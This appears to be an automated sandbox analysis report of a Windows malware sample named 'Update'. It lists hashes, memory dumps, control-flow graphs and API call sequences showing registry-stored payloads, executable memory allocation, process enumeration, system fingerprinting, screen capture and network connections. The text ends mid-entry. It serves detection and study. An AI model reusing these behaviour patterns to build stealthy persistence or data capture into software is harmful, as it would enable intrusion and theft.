                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: $,$jIk$6
                                                                                                • API String ID: 4218353326-1611763776
                                                                                                • Opcode ID: 5abb027c1b783c1ad9a3ea9b16bbe9298652f2e300fad3c4f09094671ae3eccf
                                                                                                • Instruction ID: 64c3ac971c2b684459d4e88d2cb72b5d6cd0be2151149d618b0f7ff07e8e5533
                                                                                                • Opcode Fuzzy Hash: 5abb027c1b783c1ad9a3ea9b16bbe9298652f2e300fad3c4f09094671ae3eccf
                                                                                                • Instruction Fuzzy Hash: 1EB2BC71D212688BEB24CF68CC957EDBBB2BF45304F148298D449AB691DB715EC8CF81
                                                                                                APIs
                                                                                                  • Part of subcall function 037F5320: InterlockedDecrement.KERNEL32(00000008), ref: 037F536F
                                                                                                  • Part of subcall function 037F5320: SysFreeString.OLEAUT32(00000000), ref: 037F5384
                                                                                                  • Part of subcall function 037F5320: SysAllocString.OLEAUT32(03815148), ref: 037F53D5
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03815148,037F69A4,03815148,00000000,75BF73E0), ref: 037F67F4
                                                                                                • GetLastError.KERNEL32 ref: 037F67FE
                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 037F6816
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 037F681D
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 037F683F
                                                                                                • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 037F6871
                                                                                                • GetLastError.KERNEL32 ref: 037F687B
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 037F68E6
                                                                                                • HeapFree.KERNEL32(00000000), ref: 037F68ED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                • String ID: NONE_MAPPED
                                                                                                • API String ID: 1317816589-2950899194
                                                                                                • Opcode ID: 32e372ffb5c35e19f05acf45f2f6781f46380ae907ef0b8487e22b66a4554250
                                                                                                • Instruction ID: eccefb21c4ce2037f1bfd706a77891c5eddbaf8e58fe107976304001da778941
                                                                                                • Opcode Fuzzy Hash: 32e372ffb5c35e19f05acf45f2f6781f46380ae907ef0b8487e22b66a4554250
                                                                                                • Instruction Fuzzy Hash: 614175B5A00218AFDB20EB64DC48FAEB77DFB85700F0045DCE719A7240DA745A85CF65
                                                                                                APIs
                                                                                                • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 037F6C8B
                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 037F6CAA
                                                                                                • _memset.LIBCMT ref: 037F6CE1
                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 037F6CF4
                                                                                                • swprintf.LIBCMT ref: 037F6D39
                                                                                                • swprintf.LIBCMT ref: 037F6D4C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                • API String ID: 3202570353-3501811827
                                                                                                • Opcode ID: f179853291fb7ab5797cc1547490693970f74fffb411d6cddb1ae83984bb3bfe
                                                                                                • Instruction ID: 19a3cf06c73a5892069030fb9d2701b5baa80fd9067348201bbf52e4f1907ca1
                                                                                                • Opcode Fuzzy Hash: f179853291fb7ab5797cc1547490693970f74fffb411d6cddb1ae83984bb3bfe
                                                                                                • Instruction Fuzzy Hash: 7A3161B6E0020C9FDB14DFE9CC45BEEB7B9FB48700F50425DEA1AA7241EA746905CB94
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: $,$jIk
                                                                                                • API String ID: 4218353326-2946808363
                                                                                                • Opcode ID: f34cf6a45f8b81a015cd7c8fe9c1f01a46c02da81b27f58b060f701db30e872d
                                                                                                • Instruction ID: 3241342fa29187d07a44a6c7efed478e255b9185865387cdf98eed4deeddac6b
                                                                                                • Opcode Fuzzy Hash: f34cf6a45f8b81a015cd7c8fe9c1f01a46c02da81b27f58b060f701db30e872d
                                                                                                • Instruction Fuzzy Hash: 75A2ED71D212688BEB24CF68CC957EDBBB2BF45304F148298D449AB691DB715EC8CF81
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: $,$jIk
                                                                                                • API String ID: 4218353326-2946808363
                                                                                                • Opcode ID: 9b8412707b1994b36f8924e5f88b1bef4aef14949898191440e8ba863fa60e3d
                                                                                                • Instruction ID: 36cf48475b2ba84d9810f27a94c94753bdfc9b5758ef0e772322c4c9241ed4c3
                                                                                                • Opcode Fuzzy Hash: 9b8412707b1994b36f8924e5f88b1bef4aef14949898191440e8ba863fa60e3d
                                                                                                • Instruction Fuzzy Hash: 29B2DD71D112688BEB24CF28CC957EDBBB2BF45304F158298D449AB691DB715EC8CF81
                                                                                                APIs
                                                                                                • CreateDXGIFactory.DXGI(0381579C,?,4EB10097,74DEDF80,00000000,75BF73E0), ref: 037F6F4A
                                                                                                • swprintf.LIBCMT ref: 037F711E
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 037F71C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                • API String ID: 3803070356-257307503
                                                                                                • Opcode ID: 3e6c4638a247f37235102b937dba837c8bf62610cf689fe7397f59c4cf378814
                                                                                                • Instruction ID: d632739f575c0d2e6bb36f0bd7669cc5d649bc8dd96c4a8449af4eef0b4107e6
                                                                                                • Opcode Fuzzy Hash: 3e6c4638a247f37235102b937dba837c8bf62610cf689fe7397f59c4cf378814
                                                                                                • Instruction Fuzzy Hash: 7AE15471A002659FDF68DE64CC80BEEB3B5BF89740F1446E9DA19A7384D730AE418F91
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA91070: SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6CA91124
                                                                                                  • Part of subcall function 6CA91070: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA9115F
                                                                                                • Sleep.KERNEL32(000000C8), ref: 6CA92B0D
                                                                                                • _strlen.LIBCMT ref: 6CA92B53
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFileIos_base_dtorSleep_strlenstd::ios_base::_
                                                                                                • String ID: $,$jIk
                                                                                                • API String ID: 3921760320-2946808363
                                                                                                • Opcode ID: 1b028ce1c9482a697b45d1a8f65294d9a3816c97f7a3be99ffc3503a99b7f044
                                                                                                • Instruction ID: d43ff734e1ad635f77be2825ad0c6bb7defa232b1777dbe7c521441da40cda8d
                                                                                                • Opcode Fuzzy Hash: 1b028ce1c9482a697b45d1a8f65294d9a3816c97f7a3be99ffc3503a99b7f044
                                                                                                • Instruction Fuzzy Hash: BBA2DC71D112688BEB24CF68CC953EDBBF2BF46304F148298D449AB691DB715EC8CB81
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: $,$SPV$jIk
                                                                                                • API String ID: 4218353326-3917736278
                                                                                                • Opcode ID: d413b27242cc69eed555b8e6b803980153b01b52832606db2bff45a140ed7b47
                                                                                                • Instruction ID: 7855f597d33b4bf8e1895bf330b101cce2a0cf0f75a1c76609a4ad74573787db
                                                                                                • Opcode Fuzzy Hash: d413b27242cc69eed555b8e6b803980153b01b52832606db2bff45a140ed7b47
                                                                                                • Instruction Fuzzy Hash: D892BC71D112688BEB24CF68C8953EDBBF2BF46304F158298D449AB691DB715EC8CB81
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037F607C
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 037F6088
                                                                                                • Process32FirstW.KERNEL32(00000000,00000000), ref: 037F60B9
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 037F610F
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 037F6116
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                • String ID:
                                                                                                • API String ID: 2526126748-0
                                                                                                • Opcode ID: e4746fa507987458b0b7841b06f04222a8671a0839929f9c0ae4d3b1cb846ba7
                                                                                                • Instruction ID: b0de35aa599f53406f60d9c78a9707f1db93114e11f02eee5c506619b938d06d
                                                                                                • Opcode Fuzzy Hash: e4746fa507987458b0b7841b06f04222a8671a0839929f9c0ae4d3b1cb846ba7
                                                                                                • Instruction Fuzzy Hash: 2121B531600118AFDB20FF74DC99BEEB3A9FF18320F1446E9DE1A97280EB359A00C650
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Time_memmovetime
                                                                                                • String ID:
                                                                                                • API String ID: 1463837790-0
                                                                                                • Opcode ID: e4a44b8ba9cf7b73ba5725c38a944c4cc1f5896fc2cd8922260d4bc0fb7fea26
                                                                                                • Instruction ID: cd0c0d072d40e2ececdf4e6d6c0efc2fd8ee34a590cb6dcbc8ce5532614b90be
                                                                                                • Opcode Fuzzy Hash: e4a44b8ba9cf7b73ba5725c38a944c4cc1f5896fc2cd8922260d4bc0fb7fea26
                                                                                                • Instruction Fuzzy Hash: F851C37A7006059FE711DF69C8C4A7AF7A9FF48214B58866CEA1ACB704DB31F851CB90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 902 100054c0-100054d6 903 100054dc-100054e1 902->903 904 1000580e-10005813 902->904 905 10005707-1000575f VirtualAlloc call 1000c880 call 100067ff 903->905 906 100054e7-1000550f RegOpenKeyExW 903->906 927 10005761-100057a1 call 1000c880 RegCreateKeyW 905->927 928 100057dd-100057ec 905->928 907 10005515-10005538 RegQueryValueExW 906->907 908 100055ba-100055bf 906->908 911 1000553a-10005567 call 100067ff call 1000c800 RegQueryValueExW 907->911 912 100055ad-100055b7 RegCloseKey 907->912 910 100055c2-100055c8 908->910 914 100055e8-100055ea 910->914 915 100055ca-100055cd 910->915 937 10005569-100055a8 VirtualAlloc call 1000c880 911->937 938 100055aa 911->938 912->908 920 100055ed-100055ef 914->920 918 100055e4-100055e6 915->918 919 100055cf-100055d7 915->919 918->920 919->914 923 100055d9-100055e2 919->923 924 100055f5-100055fc 920->924 925 100056f8-10005702 920->925 923->910 923->918 931 10005611-100056d4 call 1000c800 * 3 call 100067ff call 1000c880 924->931 932 100055fe-1000560b VirtualFree 924->932 930 100057ee-1000580b call 1000721b Sleep call 10002d10 925->930 939 100057a3-100057c4 RegDeleteValueW RegSetValueExW 927->939 940 100057ca-100057d5 RegCloseKey call 100072bb 927->940 928->930 948 1000580d 930->948 956 100056e6-100056f5 call 1000680a 931->956 957 100056d6-100056e3 931->957 932->931 937->938 938->912 939->940 947 100057da 940->947 947->928 948->904 960 100056e4 call 100060df 957->960 961 100056e4 call 100031ef 957->961 960->956 961->956
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
                                                                                                • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 1000552E
                                                                                                • _memset.LIBCMT ref: 10005548
                                                                                                • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 10005563
                                                                                                • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100055B1
                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 10005605
                                                                                                • _memset.LIBCMT ref: 10005669
                                                                                                • _memset.LIBCMT ref: 1000568D
                                                                                                • _memset.LIBCMT ref: 1000569F
                                                                                                • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005726
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 10005799
                                                                                                • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 100057AC
                                                                                                • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
                                                                                                • RegCloseKey.KERNEL32(?), ref: 100057CE
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 100057FE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                • API String ID: 354323817-737951744
                                                                                                • Opcode ID: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                                                • Instruction ID: 005816a77294032e0ea7aedf6318117014c310f5a4f2017eaf50af4860f80873
                                                                                                • Opcode Fuzzy Hash: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                                                • Instruction Fuzzy Hash: 5891D475A00718ABF710CF60CC84FAB77BAFB88741F508158FA089B245DB75EA40CB51

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1226 37f9e50-37f9e85 GdipGetImagePixelFormat 1227 37f9e8a-37f9eb1 1226->1227 1228 37f9e87 1226->1228 1229 37f9ec9-37f9ecf 1227->1229 1230 37f9eb3-37f9ec3 1227->1230 1228->1227 1231 37f9eeb-37f9f04 GdipGetImageHeight 1229->1231 1232 37f9ed1-37f9ee1 1229->1232 1230->1229 1233 37f9f09-37f9f2c GdipGetImageWidth 1231->1233 1234 37f9f06 1231->1234 1232->1231 1235 37f9f2e 1233->1235 1236 37f9f31-37f9f4e call 37f9c30 1233->1236 1234->1233 1235->1236 1239 37fa055-37fa05a 1236->1239 1240 37f9f54-37f9f68 1236->1240 1241 37fa2a4-37fa2ba call 37ff00a 1239->1241 1242 37fa0cf-37fa0d7 1240->1242 1243 37f9f6e-37f9f87 GdipGetImagePaletteSize 1240->1243 1245 37fa0dd-37fa11a GdipBitmapLockBits 1242->1245 1246 37fa20a-37fa27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 1242->1246 1247 37f9f8c-37f9f98 1243->1247 1248 37f9f89 1243->1248 1252 37fa11c-37fa121 1245->1252 1253 37fa14a-37fa177 1245->1253 1254 37fa281-37fa283 1246->1254 1249 37f9f9a-37f9fa5 call 37f9650 1247->1249 1250 37f9fb2-37f9fba 1247->1250 1248->1247 1249->1250 1273 37f9fa7-37f9fb0 call 380c660 1249->1273 1258 37f9fbc-37f9fca call 37ff673 1250->1258 1259 37f9fd0-37f9fd5 call 37f1280 1250->1259 1260 37fa123 1252->1260 1261 37fa140-37fa145 1252->1261 1255 37fa1bf-37fa1de GdipBitmapUnlockBits 1253->1255 1256 37fa179-37fa18e call 38007f2 1253->1256 1262 37fa285 1254->1262 1263 37fa2a2 1254->1263 1255->1254 1267 37fa1e4-37fa1e7 1255->1267 1278 37fa200-37fa205 call 37f1280 1256->1278 1279 37fa190-37fa197 1256->1279 1276 37f9fda-37f9fe5 1258->1276 1281 37f9fcc-37f9fce 1258->1281 1259->1276 1269 37fa12b-37fa13e call 37ff639 1260->1269 1261->1241 1264 37fa28d-37fa2a0 call 37ff639 1262->1264 1263->1241 1264->1263 1284 37fa287 1264->1284 1267->1254 1269->1261 1290 37fa125 1269->1290 1283 37f9fe7-37f9fe9 1273->1283 1276->1283 1278->1246 1279->1278 1285 37fa19e-37fa1bd 1279->1285 1286 37fa1ec-37fa1f1 call 37f1280 1279->1286 1287 37fa1f6-37fa1fb call 37f1280 1279->1287 1281->1283 1291 37f9feb-37f9fed 1283->1291 1292 37fa016-37fa030 GdipGetImagePalette 1283->1292 1284->1264 1285->1255 1285->1256 1286->1287 1287->1278 1290->1269 1293 37f9fef 1291->1293 1294 37fa00c-37fa011 1291->1294 1295 37fa03b-37fa040 1292->1295 1296 37fa032-37fa038 1292->1296 1299 37f9ff7-37fa00a call 37ff639 1293->1299 1294->1241 1300 37fa04a-37fa050 call 37fcca0 1295->1300 1301 37fa042-37fa048 1295->1301 1296->1295 1299->1294 1309 37f9ff1 1299->1309 1300->1239 1301->1300 1303 37fa05f-37fa063 1301->1303 1306 37fa065 1303->1306 1307 37fa0a0-37fa0c9 call 37f9d80 SetDIBColorTable call 37fa320 1303->1307 1310 37fa068-37fa098 1306->1310 1307->1242 1309->1299 1310->1310 1311 37fa09a 1310->1311 1311->1307
                                                                                                APIs
                                                                                                • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 037F9E7B
                                                                                                • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 037F9EFC
                                                                                                • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 037F9F24
                                                                                                • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 037F9F7F
                                                                                                • _malloc.LIBCMT ref: 037F9FC0
                                                                                                  • Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
                                                                                                  • Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
                                                                                                  • Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8
                                                                                                • _free.LIBCMT ref: 037FA000
                                                                                                • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 037FA028
                                                                                                • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 037FA0B7
                                                                                                • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 037FA112
                                                                                                • _free.LIBCMT ref: 037FA134
                                                                                                • _memcpy_s.LIBCMT ref: 037FA183
                                                                                                • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 037FA1D0
                                                                                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03815A78,00022009,?,00000000,?,00000000), ref: 037FA22C
                                                                                                • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 037FA24C
                                                                                                • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 037FA267
                                                                                                • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 037FA274
                                                                                                • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 037FA27B
                                                                                                • _free.LIBCMT ref: 037FA296
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                • String ID: &
                                                                                                • API String ID: 640422297-3042966939
                                                                                                • Opcode ID: 93e53ca529c0e3f3e5548cb9a66fe69b6f8889f23eaec3db7ca880c3e77949e6
                                                                                                • Instruction ID: 32061271c0a546814222c3c1467268f47ab9bc8c98ec1ca61696c906c49f62c4
                                                                                                • Opcode Fuzzy Hash: 93e53ca529c0e3f3e5548cb9a66fe69b6f8889f23eaec3db7ca880c3e77949e6
                                                                                                • Instruction Fuzzy Hash: A8D15FB1A006199FDB60DF55CC84B9AB7B8FF88304F0485A9E70DA7301D734AA85CF69

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • ResetEvent.KERNEL32(?), ref: 037F2DBB
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 037F2DC7
                                                                                                • timeGetTime.WINMM ref: 037F2DCD
                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 037F2DFA
                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 037F2E26
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 037F2E32
                                                                                                • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 037F2E51
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 037F2E5D
                                                                                                • gethostbyname.WS2_32(00000000), ref: 037F2E6B
                                                                                                • htons.WS2_32(?), ref: 037F2E8D
                                                                                                • connect.WS2_32(?,?,00000010), ref: 037F2EAB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                • String ID: 0u
                                                                                                • API String ID: 640718063-3203441087
                                                                                                • Opcode ID: a76537d5cbf48d22b0f5167ac32665a452231be4fe8b6b08a5178ad73e7b620c
                                                                                                • Instruction ID: 8a12dbe3bc98623ea580e8e33a2e6199896717afbb34f62ada6fe292660d047b
                                                                                                • Opcode Fuzzy Hash: a76537d5cbf48d22b0f5167ac32665a452231be4fe8b6b08a5178ad73e7b620c
                                                                                                • Instruction Fuzzy Hash: 986131B1A40704AFE720EFA4DC45FAAB7BCFF48B10F104559F755AB2D0D6B0A9048B64

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • ResetEvent.KERNEL32(?), ref: 10002D9B
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10002DA7
                                                                                                • timeGetTime.WINMM ref: 10002DAD
                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 10002DDA
                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 10002E06
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E12
                                                                                                • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 10002E31
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E3D
                                                                                                • gethostbyname.WS2_32(00000000), ref: 10002E4B
                                                                                                • htons.WS2_32(?), ref: 10002E6D
                                                                                                • connect.WS2_32(?,?,00000010), ref: 10002E8B
                                                                                                Strings
                                                                                                Memory Dump Source
